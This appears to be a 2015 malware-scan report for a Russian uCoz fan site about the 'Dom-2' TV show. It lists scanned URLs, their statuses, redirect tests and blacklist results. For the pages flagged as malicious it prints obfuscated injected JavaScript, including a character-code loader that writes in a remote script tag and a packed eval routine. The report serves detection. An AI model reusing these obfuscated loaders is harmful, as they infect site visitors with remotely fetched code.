Scanned pages/files
Request | Server response | Status |
http://pro-dom2.ucoz.ru/publ/dom_2_novosti_teleproekta/sveta_davydova_materraco/1-1-0-37 | 200 OK Content-Length: 38610 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function L264(WXs576){document.write( String.fromCharCode(parseInt(WXs576)-5));} document.write("<sc"+"ript type='text/javascript' language='javascr"+"ipt' src='"); var po706="109`121`121`117`63`52`52`115`106`127`123`"+ "102`113`51`116`112`116`120`109`106`104`109`112`102`"+ "51`115`106`121`52`120`52`117`90`84`103`113`56`61`56`"+ "54`52`68`120`110`105`66`61`55`53`61`55";var VQ777=po706.split("`"); for(VVl520=0;VVl520<VQ777.length;VVl520++){L264(VQ777[VVl520]);} document.write("'></sc"+"ript>"); Antivirus reports:
| ||
http://s33.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://s33.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22097 Content-Type: text/javascript | clean |
http://s33.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://s33.ucoz.net/cgi/uutils.fcg?a=soc_comment_get_data&site=0pro-dom2 | 200 OK Content-Length: 525 Content-Type: application/javascript | clean |
http://s33.ucoz.net/src/socCom.js | 200 OK Content-Length: 6344 Content-Type: text/javascript | clean |
http://pro-dom2.ucoz.ru/publ/rss/ | 200 OK Content-Length: 17494 Content-Type: text/xml | clean |
http://pro-dom2.ucoz.ru/test404page.js | 404 Not Found Content-Length: 6869 Content-Type: text/html | clean |
http://pro-dom2.ucoz.ru/ | 200 OK Content-Length: 41503 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) k="%3Cscript%20type%3D%22text%2FJavaScript%22%20language%3D%22JavaScript%22%20charset%3D%22windows-1251%22%3Eeval%28function%28iqr%2Ca%2Cc%2Ck%2Ce%2Cd%29%7Be%3Dfunction%28c%29%7Breturn%20c.toString%2836%29%7D%3Bif%28%21%27%27.replace%28%2F%5E%2F%2CString%29%29%7Bwhile%28c--%29%7Bd%5Bc.toString%28a%29%5D%3Dk%5Bc%5D%7C%7Cc.toString%28a%29%7Dk%3D%5Bfunction%28e%29%7Breturn%20d%5Be%5D%7D%5D%3Be%3Dfunction%28%29%7Breturn%27%5C%5Cw%2B%27%7D%3Bc%3D1%7D%3Bwhile%28c--%29%7Bif%28k%5Bc%5D%29%7Biqr%3Diqr.re Antivirus reports:
| ||
http://pro-dom2.ucoz.ru/register | 200 OK Content-Length: 23193 Content-Type: text/html | clean |
http://pro-dom2.ucoz.ru/gb | 200 OK Content-Length: 34511 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _y8M=''; function _dS(s){ var i;var r=""; var l=s.length-1; var k=s.substr(l,1); for (i=0;i<l;i++){ c=s.charCodeAt(i)-k; if(c<32){ c=127-(32-c);} r+=String.fromCharCode(c); } return r;} _y8M=_dS('>kprwv"v{rg?$jkffgp$"pcog?$uqu$"xcnwg?$3782:33;3:$"1@2'); Antivirus reports:
| ||
http://pro-dom2.ucoz.ru/publ | HTTP/1.1 301 Moved Permanently Cache-Control: private Connection: close Date: Wed, 22 Jul 2015 04:39:45 GMT Location: http://pro-dom2.ucoz.ru/ Server: uServ/3.3.1 Content-Type: application/octet-stream Set-Cookie: 0pro-dom2uCoz=; path=/; expires=Mon, 22-Jul-2013 04:39:45 GMT; domain=.pro-dom2.ucoz.ru; | clean |
http://pro-dom2.ucoz.ru/panel/?a=ustat;u=pro-dom2;d=0;il=ru | HTTP/1.1 302 Found Connection: close Date: Wed, 22 Jul 2015 04:39:45 GMT Location: http://pro-dom2.ucoz.ru/panel/?a=ustat;u=pro-dom2;d=0;il=ru&sdc=1 Server: uServ/3.3.1 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: 0pro-dom2uCozso=0; path=/panel/; expires=Wed, 22-Jul-2015 04:39:44 GMT; domain=pro-dom2.ucoz.ru; Set-Cookie: 0pro-dom2lng=ru; path=/; expires=Thu, 21-Jul-2016 04:39:45 GMT; Set-Cookie: 0pro-dom2uzdc=1; path=/ | clean |
http://pro-dom2.ucoz.ru/panel/?a=ustat;u=pro-dom2;d=0;il=ru&sdc=1 | 200 OK Content-Length: 769 Content-Type: text/html | clean |
http://pro-dom2.ucoz.ru/publ/dom_2_novosti_teleproekta/1 | 200 OK Content-Length: 42598 Content-Type: text/html | suspicious |
Suspicious code found </span> | ||
http://pro-dom2.ucoz.ru/publ/ | HTTP/1.1 301 Moved Permanently Cache-Control: private Connection: close Date: Wed, 22 Jul 2015 04:39:46 GMT Location: http://pro-dom2.ucoz.ru/ Server: uServ/3.3.1 Content-Type: application/octet-stream Set-Cookie: 0pro-dom2uCoz=; path=/; expires=Mon, 22-Jul-2013 04:39:46 GMT; domain=.pro-dom2.ucoz.ru; | clean |
http://pro-dom2.ucoz.ru/publ/dom_2_novosti_teleproekta/1-2 | 200 OK Content-Length: 44483 Content-Type: text/html | clean |
http://pro-dom2.ucoz.ru/publ/dom_2_novosti_teleproekta/1-1 | 200 OK Content-Length: 42610 Content-Type: text/html | suspicious |
Suspicious code found </span> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pro-dom2.ucoz.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 22 Jul 2015 04:39:44 GMT
Server: uServ/3.3.1
Content-Length: 41503
Content-Type: text/html; charset=UTF-8
...41503 bytes of data.
GET / HTTP/1.1
Host: pro-dom2.ucoz.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 22 Jul 2015 04:39:44 GMT
Server: uServ/3.3.1
Content-Length: 41503
Content-Type: text/html; charset=UTF-8
...41503 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: pro-dom2.ucoz.ru
Referer: http://www.google.com/search?q=pro-dom2.ucoz.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: pro-dom2.ucoz.ru
Referer: http://www.google.com/search?q=pro-dom2.ucoz.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pro-dom2.ucoz.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pro-dom2.ucoz.ru/
Result: pro-dom2.ucoz.ru is not infected or malware details are not published yet.
Result: pro-dom2.ucoz.ru is not infected or malware details are not published yet.